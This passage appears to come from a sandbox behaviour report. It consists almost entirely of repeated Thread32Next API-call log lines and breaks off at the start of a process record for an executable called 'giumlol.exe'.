(hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.944] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.945] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.946] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.946] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.947] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.948] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.949] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.949] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.950] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.951] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.952] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.953] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.953] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.954] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0280.955] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.085] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.094] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.095] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.119] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.119] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.120] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.263] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.264] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.265] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.266] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.267] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.268] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.268] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.269] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.270] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.271] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.271] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.272] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.273] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.274] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.274] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.275] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.276] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.276] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.277] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.278] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.279] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.280] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.281] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.282] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.282] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.283] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.284] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.285] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.285] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.288] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.288] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.289] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.290] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.291] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.291] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.298] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.298] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.591] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.591] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.592] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.593] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.595] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.596] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.596] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.613] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.615] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.615] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.616] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.617] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.618] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.619] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.619] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.620] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.621] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.622] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.623] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.624] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.625] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.625] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.626] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.627] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.628] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.628] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.629] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.630] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.631] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.632] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.633] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.634] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.634] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.635] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.636] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.637] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.638] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.639] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.640] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.640] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.810] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.812] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.813] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.814] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.814] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.817] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.818] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.819] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.819] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.820] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.821] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.822] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.823] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.824] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.825] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.826] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.826] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.827] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.827] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.828] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.829] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.830] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.830] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.831] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.832] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.833] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.833] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.834] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.835] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.836] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.836] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.837] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.839] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.840] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.841] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.842] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.843] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.845] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.846] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.942] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.944] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.945] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.946] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.947] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.948] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.949] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.949] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.950] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.951] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.952] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.953] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.953] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.954] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.955] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.956] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.956] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.957] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.958] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.958] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.959] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.960] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.961] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.962] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.963] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.963] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.964] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.965] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.966] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.967] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.968] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.968] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.969] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0281.969] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.112] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.119] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.120] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.121] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.122] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.123] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.124] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.125] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.131] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.275] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.276] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.277] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.277] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.278] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.279] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.280] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.281] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.282] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.283] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.284] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.284] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.285] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.286] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.287] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.288] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.289] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.290] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.290] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.291] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.298] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.301] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.303] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.304] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.305] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.306] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.306] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.307] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.307] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.308] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.309] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.478] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.479] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.480] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.481] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.482] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.483] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.483] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.484] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.485] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.486] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.487] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.487] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.488] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.489] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.490] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.491] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.492] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.492] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.493] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.494] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.495] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.496] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.497] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.498] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.498] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.499] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.500] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.501] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.502] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.503] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.504] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.504] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.505] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.506] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.506] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.507] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 Thread: id = 226 os_tid = 0x4bc Process: id = "33" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x2064a000" os_pid = "0x13c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = 